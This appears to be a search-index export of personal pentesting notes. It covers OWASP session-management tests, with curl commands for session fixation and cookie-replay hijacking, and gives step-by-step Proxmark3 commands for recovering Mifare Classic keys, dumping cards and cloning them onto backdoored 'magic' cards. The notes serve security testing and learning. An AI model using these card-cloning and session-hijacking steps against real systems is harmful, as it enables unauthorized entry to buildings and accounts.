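# 1. Grab a pre-auth session cookie into a jar\ncurl -s -c pre.txt http://example.com/login >/dev/null\n\n# 2. Authenticate while presenting that cookie\ncurl -s -b pre.txt -c post.txt -d 'user=alice&pass=secret' http://example.com/login >/dev/null\n\n# 3. No difference in the session ID after login indicates session fixation\ndiff pre.txt post.txt\n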

                            ","tags":["web pentesting","WSTG-SESS-03"]},{"location":"OWASP/WSTG-SESS-03/#mitigation","title":"Mitigation","text":"
                            • Implementing a session token renewal after a user successfully authenticates.
                            • The application should always first invalidate the existing session ID before authenticating a user, and if the authentication is successful, provide another session ID.
                            • Prevent \"forced cookies\" with full HSTS adoption.
                            ","tags":["web pentesting","WSTG-SESS-03"]},{"location":"OWASP/WSTG-SESS-04/","title":"Testing for Exposed Session Variables","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.4. Testing for Exposed Session Variables

                            ID Link to Hackinglife Link to OWASP Description 6.4 WSTG-SESS-04 Testing for Exposed Session Variables - Ensure that proper encryption is implemented (Encryption & Reuse of session Tokens vulnerabilities). - Review the caching configuration. - Assess the channel and methods' security (Send sessionID with GET method ?)","tags":["web pentesting","WSTG-SESS-04"]},{"location":"OWASP/WSTG-SESS-05/","title":"Testing for Cross Site Request Forgery","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.5. Testing for Cross Site Request Forgery

                            ID Link to Hackinglife Link to OWASP Description 6.5 WSTG-SESS-05 Testing for Cross Site Request Forgery - Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. - Conduct URL analysis, Direct access to functions without any token.

                            Cross Site Request Forgery (CSRF) is a type of web security vulnerability that occurs when an attacker tricks a user into performing actions on a web application without their knowledge or consent. A successful CSRF exploit can compromise end user data and operation when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application.

                            ","tags":["web pentesting","WSTG-SESS-05"]},{"location":"OWASP/WSTG-SESS-05/#see-my-notes","title":"See my notes","text":"
                            • CSRF attack - Cross Site Request Forgery
                            ","tags":["web pentesting","WSTG-SESS-05"]},{"location":"OWASP/WSTG-SESS-06/","title":"Testing for Logout Functionality","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.6. Testing for Logout Functionality

                            ID Link to Hackinglife Link to OWASP Description 6.6 WSTG-SESS-06 Testing for Logout Functionality - Assess the logout UI. - Analyze the session timeout and if the session is properly killed after logout.","tags":["web pentesting","WSTG-SESS-06"]},{"location":"OWASP/WSTG-SESS-07/","title":"Testing Session Timeout","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.7. Testing Session Timeout

                            ID Link to Hackinglife Link to OWASP Description 6.7 WSTG-SESS-07 Testing Session Timeout - Validate that a hard session timeout exists, after the timeout has passed, all session tokens should be destroyed or be unusable.","tags":["web pentesting","WSTG-SESS-07"]},{"location":"OWASP/WSTG-SESS-08/","title":"Testing for Session Puzzling","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.8. Testing for Session Puzzling

                            ID Link to Hackinglife Link to OWASP Description 6.8 WSTG-SESS-08 Testing for Session Puzzling - Identify all session variables. - Break the logical flow of session generation. - Check whether the application uses the same session variable for more than one purpose","tags":["web pentesting","WSTG-SESS-08"]},{"location":"OWASP/WSTG-SESS-09/","title":"Testing for Session Hijacking","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.9. Testing for Session Hijacking

                            ID Link to Hackinglife Link to OWASP Description 6.9 WSTG-SESS-09 Testing for Session Hijacking - Identify vulnerable session cookies. - Hijack vulnerable cookies and assess the risk level.

                            An attacker who gets access to user session cookies can impersonate them by presenting such cookies. This attack is known as session hijacking.

                            ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-09/#testing","title":"Testing","text":"

                            The testing strategy is targeted at network attackers, hence it only needs to be applied to sites without full HSTS adoption (sites with full HSTS adoption are secure, since their cookies are not communicated over HTTP).

We assume to have two testing accounts on the website under test, one to act as the victim and one to act as the attacker. We simulate a scenario where the attacker steals all the cookies which are not protected against disclosure over HTTP, and presents them to the website to access the victim's account. If these cookies are enough to act on the victim's behalf, session hijacking is possible.

Steps for executing this test:

1. Login to the website as the victim and reach any page offering a secure function requiring authentication.
2. Delete from the cookie jar all the cookies which satisfy any of the following conditions: in case there is no HSTS adoption, the Secure attribute is set; in case there is partial HSTS adoption, the Secure attribute is set or the Domain attribute is not set.
3. Save a snapshot of the cookie jar.
4. Trigger the secure function identified at step 1.
5. Observe whether the operation at step 4 has been performed successfully. If so, the attack was successful.
6. Clear the cookie jar, login as the attacker and reach the page at step 1.
7. Write in the cookie jar, one by one, the cookies saved at step 3.
8. Trigger again the secure function identified at step 1.
9. Clear the cookie jar and login again as the victim.
10. Observe whether the operation at step 8 has been performed successfully in the victim's account. If so, the attack was successful; otherwise, the site is secure against session hijacking.
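
A hedged curl sketch of steps 6-8, assuming a hypothetical SESSIONID cookie value saved at step 3:

# Log in as the attacker, then replay the captured cookie while triggering the secure function\ncurl -s -b 'SESSIONID=<value-saved-at-step-3>' 'https://example.com/secure-function'\n# If the operation lands in the victim's account, session hijacking is possible\n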

                            ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-09/#mitigation","title":"Mitigation","text":"
                            • Full HSTS adoption.
                            ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-10/","title":"Testing JSON Web Tokens","text":"

                            OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.10. Testing JSON Web Tokens

                            ID Link to Hackinglife Link to OWASP Description 6.10 WSTG-SESS-10 Testing JSON Web Tokens - Determine whether the JWTs expose sensitive information. - Determine whether the JWTs can be tampered with or modified.","tags":["web pentesting","WSTG-SESS-10"]},{"location":"RFID/mifare-classic/","title":"Mifare Classic","text":"","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic_1","title":"Mifare classic","text":"

The MiFare Classic is an NFC chip following the ISO 14443A standard. The memory of this chip (assuming we are talking about the Classic 1K) is divided into 16 sectors of 64 bytes each. Like most, if not all, NFC cards it also contains a UID and other data. Each sector can contain 2 keys as well as access condition information. All of these sectors can be encrypted with the Crypto1 algorithm to protect the data from being copied. Each key in each sector can be used to open a door (or anything else) in a sequence that goes something like this:

                            1. Reader detects NFC card and sends out information to unlock at least 1 sector on the MiFare Classic chip
                            2. Assuming the MiFare classic is programmed for this door, it sends back the key and access conditions
                            3. The reader validates the key and access conditions it receives and checks if the UID of the key is valid or within a specified range
                            4. If everything is in order, the reader opens the door
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic-cards","title":"Mifare Classic Cards","text":"
                            • Mifare Classic 1K
                            • Mifare Classic 4K
                            • Mifare Classic EV1

In a Mifare Classic card there are sectors, and each sector contains a number of blocks. Each sector has a sector trailer, which is a block through which you can access data. That means the access conditions are stored in the sector trailer (key A, key B and the access bits).

Each Mifare tag has a 4-byte UID which is unique and not changeable. Some Mifare cards have a 7-byte UID.

Transport configuration: At chip delivery, all keys are set to 0xFF FF FF FF FF FF (6 times FFh) and bytes 6, 7 and 8 are set to 0xFF0780 (see Transport Configuration). Additionally, byte 9 is used for one byte of general-purpose user data; its factory default value is 0x69. Therefore, at chip delivery the sector trailer would be:

Byte:  0  1  2  3  4  5  6  7  8  9  10 11 12 13 14 15
Value: FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF

                            Or:

Key A (bytes 0-5): FF FF FF FF FF FF
Access bits (bytes 6-8): FF 07 80
User byte (byte 9): 69
Key B (bytes 10-15): FF FF FF FF FF FF

Transport configuration is the name for the factory default keys and configuration:

• KeyA: 0x FF FF FF FF FF FF (default key; cannot be read)
• KeyB: 0x FF FF FF FF FF FF (default data). KeyB is used as data in the transport configuration because it is readable; it cannot be used as an authentication key.
• Access bits: 0xFF0780, meaning:
• KeyA can never be read, but can write (change) itself.
• KeyA can read/write the access bits and KeyB.
• Notice that KeyB is readable by KeyA. Thus, KeyB cannot be used as an authentication key; it can be used for general-purpose user data.
• KeyA is allowed to read/write/increment/decrement the data blocks.

                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classics-1k","title":"Mifare Classics 1K","text":"

                            Memory Organization:

                            • 1024 Bytes
                            • Sectors and Blocks:
                            • 16 Sectors (0-15).
• 4 blocks in each Sector
                            • 16 Bytes in each Block
                            • 2 Keys (A/B) in each Sector
                            • Sector Trailer
                            • Authentication is required

Access bits and conditions. Attention: with each memory access the internal logic verifies the format of the access conditions. If it detects a format violation, the whole sector is irreversibly blocked.

On chip delivery the access conditions for the sector trailers and KeyA are predefined as the transport configuration. Since KeyB may be read in the transport configuration, it cannot be used as an authentication key, and new cards must be authenticated with KeyA. Since the access bits themselves can also be blocked, special care has to be taken during the personalization of cards.

                            Access conditions of sector trailer:

                            Access Conditions of Data Block

The following example analyses the Transport Configuration Access Bits (0xFF0780):

                            • Byte6 = 0xFF
                            • Byte7 = 0x07
                            • Byte8 = 0x80
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic-4k","title":"Mifare Classic 4K","text":"

Memory structure:

                            • 4096 Bytes
                            • 40 Sectors (0-39)
• 32 Sectors (0-31) with 4 blocks each
• 8 Sectors (32-39) with 16 blocks each
                            • Each Sector has Sector Trailer Block
                            • Authentication is required
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#cloning-a-mifare-classic","title":"Cloning a MIFARE classic","text":"

                            Proxmark Cheat sheet

                            Make sure that it's a MIFARE classic 1K card:

                            hf search\n

The last line should return:

                            Valid ISO14443A Tag Found - Quitting Search\n

                            In this case it\u2019s a Mifare 1k card. Copy the UID of the card, which we\u2019ll need later. From there we can find keys in use by checking against a list of default keys (hopefully one of these has been used):

                            hf mf chk --1k -f mfc_default_keys\n

                            Results:

                            Found valid key:[ffffffffffff]  \n

This shows a key of ffffffffffff, which we can plug into the next command to dump the keys to a file:

                            hf mf nested --1k --blk 0 -a -k FFFFFFFFFFFF --dump\n

This dumps the keys from the card into a key file (hf-mf-<UID>-key.bin). The output should be something like this:

                            [+] Testing known keys. Sector count 16\n[+] Fast check found all keys\n\n[+] found keys:\n\n[+] -----+-----+--------------+---+--------------+----\n[+]  Sec | Blk | key A        |res| key B        |res\n[+] -----+-----+--------------+---+--------------+----\n[+]  000 | 003 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] -----+-----+--------------+---+--------------+----\n[+] ( 0:Failed / 1:Success )\n\n[+] Generating binary key file\n[+] Found keys have been dumped to `/home/ME/hf-mf-<UID>-key.bin`\n[=] --[ FFFFFFFFFFFF ]-- has been inserted for unknown keys where res is 0\n

                            Another way is to do an autopwn:

                            hf mf autopwn\n

                            Now to dump the contents of the card:

                            hf mf dump --1k\n

This dumps the data from the card into a dump file (hf-mf-<UID>-dump.bin). The output should be something like this:

                            Using... hf-mf-<UID>-key.bin\n[+] Loaded binary key file `/home/ME/hf-mf-<UID>-key.bin`\n[=] Reading sector access bits...\n[=] .................\n[+] Finished reading sector access bits\n[=] Dumping all blocks from card...\n \ud83d\udd53 Sector...  9 block... 3 ( ok )[#] Can't select card\n[#] Can't select card\n \ud83d\udd51 Sector... 15 block... 1 ( ok )[#] Can't select card\n \ud83d\udd53 Sector... 15 block... 3 ( ok )\n[+] Succeeded in dumping all blocks\n\n[+] time: 9 seconds\n\n\n[=] -----+-----+-------------------------------------------------+-----------------\n[=]  sec | blk | data                                            | ascii\n[=] -----+-----+-------------------------------------------------+-----------------\n[=]    0 |   0 | FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF | .B........]..6..\n[=]      |   1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   2 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   3 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    1 |   4 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   5 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   6 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   7 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    2 |   8 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   9 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  11 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    3 |  12 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  13 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  14 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  15 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    4 |  16 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  17 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  18 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  19 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    5 |  20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  21 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  22 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  23 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    6 |  24 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  25 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  26 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  27 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    7 |  28 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  29 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
\n[=]      |  31 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    8 |  32 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  33 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  34 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  35 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    9 |  36 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  37 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  38 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  39 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   10 |  40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  41 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  42 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  43 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   11 |  44 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  45 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  46 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  47 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   12 |  48 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  49 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  51 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   13 |  52 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  53 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  54 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  55 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   14 |  56 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  57 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  58 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  59 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]   15 |  60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  61 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  62 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  63 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=] -----+-----+-------------------------------------------------+-----------------\n\n[+] Saved 1024 bytes to binary file `/home/ME/hf-mf-<UID>-dump.bin`\n[+] Saved to json file `/home/ME/hf-mf-<UID>-dump.json`\n

At this point we've got everything we need from the card, so we can take it off the reader.

                            Now there are two ways to proceed:

                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#way-1-cload","title":"Way 1: cload","text":"

Create an .eml file from the previously obtained binary dump file:

# First go to <yourpath>/proxmark/tools/\ncd proxmark/tools/\n\n# Run the script pm3_mfd2eml.py\npython3 ./pm3_mfd2eml.py /home/PATH/hf-mf-<UID>-dump.bin /home/PATH/hf-mf-<UID>-dump.eml\n

                            Load the eml file into your magic card:

                            hf mf cload -f /home/PATH/hf-mf-<UID>-dump.eml\n
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#way-2-restore","title":"Way 2: restore","text":"

To copy that data onto a new card, place the new card (a magic card with the so-called Chinese backdoor) on the proxmark:

hf mf restore --1k --uid <UID> -k /home/ME/hf-mf-<UID>-key.bin\n

                            This restores the dumped data onto the new card. Now we just need to give the card the UID we got from the original hf search command:

                            hf mf csetuid --uid <UID>\n
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#resources","title":"Resources","text":"

                            https://jaymonsecurity.com/seguridad-clonar-tarjeta-proxmark-red-team/

                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-desfire/","title":"Mifare Desfire","text":"","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-desfire/#basic-commands","title":"Basic commands","text":"
                            # Recover AIDs by bruteforce\nhf mfdes bruteaid\n
                            ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/","title":"Installing proxmark3 RDV4.01 in Kali","text":"

                            Basic usage

                            ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#preparing-linux","title":"Preparing Linux","text":"

                            In my case, I will create a virtual environment:

                            mkvirtualenv nfc\n
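
                            If the mkvirtualenv command is missing, it is provided by the virtualenvwrapper package (package name assumed for Debian/Kali):

                            sudo apt install virtualenvwrapper\n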

                            A system upgrade was carried out prior to following these instructions.

                            Update the package list:

                            sudo apt-get update\nsudo apt-get upgrade -y\nsudo apt-get auto-remove -y\n

                            Install the requirements

                            sudo apt-get install --no-install-recommends git ca-certificates build-essential pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev libssl-dev libgd-dev\n

                            Clone the repository:

                            git clone https://github.com/RfidResearchGroup/proxmark3.git\n

                            Check ModemManager. Make sure ModemManager will not interfere, otherwise it could brick your Proxmark3! ModemManager must be removed or disabled.

                            ModemManager is pre-installed on many Linux distributions, very probably yours as well. It is intended to prepare and configure mobile broadband (2G/3G/4G) devices, whether they are built-in or dongles. Some of these are serial devices, so when the Proxmark3 is plugged in and a /dev/ttyACM0 appears, ModemManager attempts to talk to it to see if it's a modem replying to AT commands. Now imagine what happens when you're flashing your Proxmark3 and ModemManager suddenly starts sending bytes to it at the same time: yes, it makes the flashing fail. And if it happens while you're flashing the bootloader, it will require a JTAG device to unbrick the Proxmark3. ModemManager is a threat not only to the Proxmark3 but also to many other embedded devices, such as some Arduino platforms.

                            # Solution 1: remove ModemManager\nsudo apt remove modemmanager\n\n# Solution 2: disable ModemManager\nsudo systemctl stop ModemManager\nsudo systemctl disable ModemManager\n

                            Troubleshooting issues with ModemManager

                            Connect your device using the USB cable and check that the Proxmark3 is being picked up by your computer:

                            sudo dmesg | grep -i usb\n

                            It should show up as a CDC device:

                            usb 3-3: Product: proxmark3\nusb 3-3: Manufacturer: proxmark.org\nusb 3-3: SerialNumber: iceman\ncdc_acm 3-3:1.0: ttyACM0: USB ACM device\n

                            And a new\u00a0/dev/ttyACM0\u00a0should have appeared:

                            ls -la /dev | grep ttyACM0    \n

                            Get permission to use /dev/ttyACM0 by adding the current user to the proper groups. This step can be done from the Iceman Proxmark3 repo with:

                            make accessrights\n

                            Then you need to log out and log in again for your new group membership to take effect.

                            To test you have the proper read & write rights, plug the Proxmark3 and execute:

                            [ -r /dev/ttyACM0 ] && [ -w /dev/ttyACM0 ] && echo ok\n

                            It must return ok. Otherwise, you've got a permission problem to fix.
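
                            If it doesn't, a common manual fix on Debian-based systems is to add your user to the dialout group (this is essentially what make accessrights does; the group name is an assumption for Debian/Kali):

                            sudo adduser $USER dialout\n# Log out and back in for the group change to take effect\n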

                            ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#compilation-instructions-for-rdv4","title":"Compilation instructions for RDV4","text":"

                            The repo defaults to compiling a firmware and client suitable for the Proxmark3 RDV4.

                            Get the latest commits:

                            cd proxmark3\ngit pull\n

                            Clean and compile everything:

                            make clean && make -j\n

                            If you get an error, go to the troubleshooting guide.

                            Install it, but be careful: if you run

                            sudo make install\n

                            then the required files will be installed on your system, by default in /usr/local/bin and /usr/local/share/proxmark3. Maintainers can read this doc to learn how to modify installation paths via the DESTDIR and PREFIX Makefile variables.

                            The commands given in the documentation assume you did the installation step. If you didn't, you have to adjust command and file paths accordingly, e.g. calling ./pm3 or client/proxmark3 instead of just pm3 or proxmark3.

                            In most cases, you can run the following script, which tries to auto-detect the port to use on several OSes:

                            pm3-flash-all\n

                            If it doesn't work, go to the troubleshooting guide.

                            Run the client. In most cases, you can run the script pm3, which tries to auto-detect the port to use on several OSes.

                            ./pm3\n

                            For the other cases, specify the port yourself, for example for a Proxmark3 connected via USB under Linux (adjust the port for your OS):

                            proxmark3 /dev/ttyACM0\n

                            or from the local repo

                            client/proxmark3 /dev/ttyACM0\n

                            If all went well, you should get some information about the firmware and memory usage, as well as the prompt, something like this:

                            [=] Session log /home/iceman/.proxmark3/logs/log_20230208.txt\n[+] loaded from JSON file /home/iceman/.proxmark3/preferences.json\n[=] Using UART port /dev/ttyS3\n[=] Communicating with PM3 over USB-CDC\n\n\n  8888888b.  888b     d888  .d8888b.\n  888   Y88b 8888b   d8888 d88P  Y88b\n  888    888 88888b.d88888      .d88P\n  888   d88P 888Y88888P888     8888\"\n  8888888P\"  888 Y888P 888      \"Y8b.\n  888        888  Y8P  888 888    888\n  888        888   \"   888 Y88b  d88P\n  888        888       888  \"Y8888P\"    [ \u2615 ]\n\n\n [ Proxmark3 RFID instrument ]\n\n    MCU....... AT91SAM7S512 Rev A\n    Memory.... 512 Kb ( 66% used )\n\n    Client.... Iceman/master/v4.16191 2023-02-08 22:54:30\n    Bootrom... Iceman/master/v4.16191 2023-02-08 22:54:26\n    OS........ Iceman/master/v4.16191 2023-02-08 22:54:27\n    Target.... RDV4\n\n[usb] pm3 -->\n

                            This\u00a0[usb] pm3 --> \u00a0is the Proxmark3 interactive prompt.

                            ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3-rdv4.01-setting-up/#configuration-and-verification","title":"Configuration and Verification","text":"

                            Verify the status of your installation with:

                            script run init_rdv4\n

                            To make sure you got the latest sim module firmware:

                            hw status\n

                            If you get a message such as:

                            [#] Smart card module (ISO 7816)\n[#]   version................. vX.XX ( Outdated )\n

                            Then the version is obsolete and you will need to update it. The following command upgrades your device's sim module firmware. Don't turn off your device during the execution of this command! Even though it's quite a fast command, be warned: you may brick the sim module if you interrupt it.

                            smart upgrade -f /usr/local/share/proxmark3/firmware/sim014.bin\n\n# or if from local repo\nsmart upgrade -f sim014.bin\n

                            You get the following output if the execution was successful:

                            [=] --------------------------------------------------------------------\n[!] \u26a0\ufe0f  WARNING - sim module firmware upgrade\n[!] \u26a0\ufe0f  A dangerous command, do wrong and you could brick the sim module\n[=] --------------------------------------------------------------------\n\n[=] firmware file       sim014.bin\n[=] Checking integrity  sim014.sha512.txt\n[+] loaded 3658 bytes from binary file sim014.bin\n[+] loaded 158 bytes from binary file sim014.sha512.txt\n[=] Don't turn off your PM3!\n[+] Sim module firmware uploading to PM3...\n \ud83d\udd51 3658 bytes sent\n[+] Sim module firmware updating...\n[#] FW 0000\n[#] FW 0080\n[#] FW 0100\n[#] FW 0180\n[#] FW 0200\n[#] FW 0280\n[#] FW 0300\n[#] FW 0380\n[#] FW 0400\n[#] FW 0480\n[#] FW 0500\n[#] FW 0580\n[#] FW 0600\n[#] FW 0680\n[#] FW 0700\n[#] FW 0780\n[#] FW 0800\n[#] FW 0880\n[#] FW 0900\n[#] FW 0980\n[#] FW 0A00\n[#] FW 0A80\n[#] FW 0B00\n[#] FW 0B80\n[#] FW 0C00\n[#] FW 0C80\n[#] FW 0D00\n[#] FW 0D80\n[#] FW 0E00\n[+] Sim module firmware upgrade successful    \n

                            Run the hw status command to verify that the upgrade went well:

                            hw status\n
                            ","tags":["pentesting","RFID pentesting","NFC"]},{"location":"RFID/proxmark3/","title":"Using Proxmark3 RDV4.01","text":"

                            Installation: Installing proxmark3 RDV4.01 in Kali

                            ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/proxmark3/#basic-commands","title":"Basic commands","text":"
                            # The prompt will have this appearance\n[usb] pm3 --> \n\n# Display help and commands\nhelp\n\n# Close the client\nquit\n

                            To get an overview of the available commands for LF RFID and HF RFID:

                            [usb] pm3 --> lf\n[usb] pm3 --> hf\n

                            To search quickly for known LF or HF tags:

                            [usb] pm3 --> lf search\n[usb] pm3 --> hf search\n

                            To get info on a ISO14443-A tag:

                            [usb] pm3 --> hf 14a info\n

                            Read and write:

                            # Read sector 1 with key FFFFFFFFFFFF\nhf mf rdsc -s 1 -k FFFFFFFFFFFF\n\n# Read block 13 with key FFFFFFFFFFFF\nhf mf rdbl --blk 13 -k FFFFFFFFFFFF\n\n# Write block 8 with key a FFFFFFFFFFFF \nhf mf wrbl --blk 8 -a -k FFFFFFFFFFFF -d FFFFFFFFFFFF7F078800FFFFFFFFFFFF\n

                            Getting keys

